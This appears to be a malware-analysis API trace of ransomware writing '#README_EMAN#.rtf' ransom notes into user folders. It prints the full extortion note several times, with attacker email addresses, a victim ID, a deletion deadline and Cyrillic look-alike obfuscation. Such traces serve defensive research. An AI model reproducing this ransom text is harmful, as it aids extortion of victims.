}}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0294.132] WriteFile (in: hFile=0x228, lpBuffer=0x235cca8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x235cca8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0294.911] CloseHandle (hObject=0x228) returned 1 [0294.911] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\af\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\af\\#readme_eman#.rtf")) returned 0xffffffff [0294.911] GetLastError () returned 0x2 [0294.911] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\af\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\af\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0294.914] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0294.914] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0294.914] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef9b08, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. 